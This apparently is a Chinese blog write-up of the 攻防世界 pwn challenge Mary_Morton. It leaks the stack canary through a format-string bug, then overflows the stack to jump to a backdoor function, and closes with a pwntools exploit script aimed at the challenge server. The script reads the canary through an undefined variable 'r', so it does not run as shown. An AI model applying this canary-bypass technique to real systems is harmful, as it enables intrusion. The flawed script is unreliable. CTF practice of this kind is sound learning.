攻防世界pwn--持续更新

最新推荐文章于 2024-07-16 02:03:11 发布
最新推荐文章于 2024-07-16 02:03:11 发布
阅读量683 收藏 1
点赞数
文章标签: 系统安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ckk1314520/article/details/121056830
版权

一道攻防世界的pwn题 Mary_Morton
好久都不写WP了,太懒了,emmm,以后坚持更新。
用checksec查看保护机制

这里的11就是本题,我嫌弃题的名字长就换了一个,emmm,有栈不可执行,栈溢出保护–canary。

请添加图片描述

用IDA查看伪代码

输入v3的数值来判断流程的跳转

请添加图片描述

输入1进入sub_400960()函数

请添加图片描述

输入2进入sub_4008EB()函数

请添加图片描述

发现后门函数

请添加图片描述

很明显就是canary保护

请添加图片描述

解题的大致思路就是,通过栈溢出,来执行后门函数,canary用格式化字符串来绕过。

sub_4008EB()函数存在格式化字符串漏洞,利用该漏洞来泄露栈上v2的值,来绕过canary保护。

运行一下程序查看格式化字符串函数的参数在栈上的偏移量

请添加图片描述

发现偏移量是6个字节。

确定canary和输入的参数之间的偏移

请添加图片描述

(0x90-0x8)/8=17字节,17(buf和v2的偏移量)+6(格式化字符串参数栈上的偏移量)=23字节

因为64位的程序,每个格式化字符串都是8字节,同理32位是4字节

exp.py

from pwn import*
io=remote("111.200.241.244",51326)
flag_addr=0x004008DA
io.sendlineafter('3. Exit the battle',b'2')
io.sendline('%23$p')
io.recvuntil('0x')
canary=int(r.recv(16),16)
payload=b'a'*0x88+p64(canary)+b'a'*8+p64(flag_addr)
io.recvuntil('3. Exit the battle')
io.sendline('1')
io.sendline(payload)
io.interactive()
CKL0g1c
关注
专栏目录
攻防世界 pwn
清霂的博客
02-02 697
目录1.get_shell2.when_did_you_born3.hello_pwn4.level05.level26.cgpwn2 1.get_shell nc连接题 连接后ls | cat flag 2.when_did_you_born file checksec 有canary保护,不能栈溢出 ida64 先输入v5,v5不能等于1926。再输入v4,注意有gets函数,不限制输入,但无法溢出,点进去v4,v5 发现var_18是v5,var_20是v4,那么可以输入v4时将v5的值覆盖为19
攻防世界】进阶区write up7~12(二)(持续更新中...
GZWZ_的博客
04-19 266
边做边更新,希望大家指正!!!!!
攻防世界pwn(warmup&welpwn)
song_10的博客
05-21 485
攻防世界pwn题题解记录
攻防世界pwn——pwn1
qq_62076255的博客
12-21 488
做题记录
攻防世界-Pwn-new-easypwn
wuh2333的博客
03-12 4271
攻防世界-Pwn-new-easypwn
攻防世界babystack(pwn1)——glibc_all_in_one初体验
weixin_48066554的博客
05-14 1622
攻防世界babystack(pwn1)——glibc_all_in_one初体验 文章目录攻防世界babystack(pwn1)——glibc_all_in_one初体验引入初步分析1、checksec2、伪代码分析3、栈分析解题思路1、泄露canary3、get shellexp本地libc运行尝试尝试1尝试2尝试3尝试4(重大进展) 引入 ​ 好久没做pwn题了,找了道简单的ret2libc做做,顺便尝试解决一些历史遗留问题 (其实就是让pwn题使用本地的libc的问题,省流:有突破性进展但没有完全解决
攻防世界-pwn dice_game(栈内变量覆盖)
菜的只能随便写写博客
10-09 566
  0x01 检查文件  下载附件之后获得两个文件,一个可执行文件和一个libc,初步理解要使用libc。 64位elf 无栈保护 动态链接   0x02 程序分析  根据程序运行分析,程序应该是要求猜数字,连续答对50轮可获得flag。   0x03 IDA结构分析  从里面分析,可以看到程序的结构,while循环里面是猜数字的流程,一共50轮,并可以注意到18行设置了随机数的种子。...
[CTF-PWN]攻防世界新手村-level2[wp]
murongxuege的博客
10-04 690
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 checksec监测 file查看一下文件属性,可以看到文件是linux elf文件,32字节,Inter80386微处理器。 checksec的常用命令是:c
[CTF-PWN]攻防世界新手村-when_did_you_born[wp]
murongxuege的博客
09-29 636
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1288
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
攻防世界PWN--CGfsb
Rt1Text的博客
03-27 3395
首先checksec 32位/ 开了 Canary/NX保护 再运行一下 大致就是这个流程 接下来ida里面 分析C代码 分析前先get一下格式化字符串漏洞的基础知识 举3个常见的相关函数 fprintf----prints to a FILE stream printf----prints to the 'stdout' stream sprintf--prints into a string 常见语法 %d---打印 signed int %u---打印 u...
攻防世界pwn——Mary_Morton
qq_62076255的博客
12-19 198
做题记录
攻防世界-PWN-hello_pwn
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 514
开始进军PWN题 目录 分析 拖入IDA exp 分析 使用 file 和 checksec(查看程序的保护机制) 指令分析文件 x86-64 架构 Linux可执行文件ELF checksec参数 Arch 程序架构信息。这里是amd64-64的 RELRO 主要针对 GOT 改写的攻击方式的保护 RELRO为” Partial RELRO”,说明我们对GOT表具有写权限。 这里也没作保护 Stack 栈保护 这里没有启用 NX 栈没有执行权限 这里是打开的 PI.
攻防世界——pwn(3)
weixin_44319142的博客
04-11 895
guess_num seed和rand的知识点就是一个伪生成随机数的东西要用ctypes倒入这个库才能用rand 理一下思路,利用v7覆盖seed[0],使seed[0]已知,然后循环,然后直接拿flag就好了 exp from pwn import * from ctypes import * #倒入了可以去找libc库 context.log_level = 'debug' p =...
攻防世界(pwn篇)---CGfsb
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-09 1789
攻防世界(pwn篇)—CGfsb 文章目录攻防世界(pwn篇)---CGfsb题目描述基本情况分析运行分析IDA 分析格式化字符串漏洞分析出payload找一下 s 的偏移量再看一看 pwnme 的地址exp 题目描述 菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 基本情况分析 checksec命令可以查看可执行文件开启的保护 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.S
攻防世界——pwn(2)
weixin_44319142的博客
04-09 1338
hello_pwn 只有NX哟 没啥好说的,填充然后让60106c的位置为1853186401就可以啦 直接上exp from pwn import * p = process("./hello_pwn") p.recvuntil('lets get helloworld for bof\n') payload = "A"*4 + p64(1853186401) p.send(payl...
攻防世界PWN [GFSJ0469] string (不太正经的wp)
最新发布
qq_52161487的博客
07-16 970
拐角的光线很暗,暗得我看不清她的脸和表情,还有烦人的蚊子一直叮我的腿,但从来没有任何一个夏天的感觉能够如此真实。为了回家,勉为其难地,我答应了她。那个她曾和我说过,你们这些人整天对着电脑看书,一个劲儿地用一个女生头像的软件,这一横条一横条的是什么东西,一会goto一会mov的,就像是在走迷宫。前两天在我MP3上听的那首周董的歌你还记得嘛,远方传来风笛,我只在意有你的消息......”好吧,都已经走到现在了,回去未免沦为笑柄,也辜负了巫师小姐姐对我们的期望,我们要做的只能是硬着头皮走下去,来吧,
攻防世界--- PWN学习笔记
m0_62879498的博客
12-03 447
PWN学习笔记 一,栈介绍 栈:栈是一种计算机系统中的数据结构,它按照先进后出的原则存储数据,先进入的数据被压入栈底,最后的数据在栈顶,需要读数据的时候从栈顶开始弹出数据(最后一个数据被第一个读出来),是一种特殊的线性表。栈的操作常用的有进栈(PUSH),出栈(POP),还有常用的标识栈顶和栈底。 进栈(PUSH):将一个数据放入栈里叫进栈(PUSH) 出栈(POP):将一个数据从栈里取出叫出栈(POP) 栈顶:常用寄存器ESP,ESP是栈指针寄存器,其内存放着一个指针,该指针永远指向系统栈最上面
攻防世界 hello_pwn
weixin_73399382的博客
06-30 393
然后从指针&unk_601068指定的缓冲区里面读取最多16位数据(0x10uLL解读:0x代表十六进制,uLL=unsigned long long,无符号long long 型,10转为十进制即为16)直接执行一下,这里看别人的wp是可以通过输入构造字符串来getshell的,我这里就不这么做了,多练写脚本的能力。国际惯例checksec一下,64位小端序,未开启栈溢出保护和地址随机化,很明显这道题利用栈溢出了。刚学pwn的小白,大家互相学习,看看哪里说得不对打在评论区!写脚本,下面两个略微差别。
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值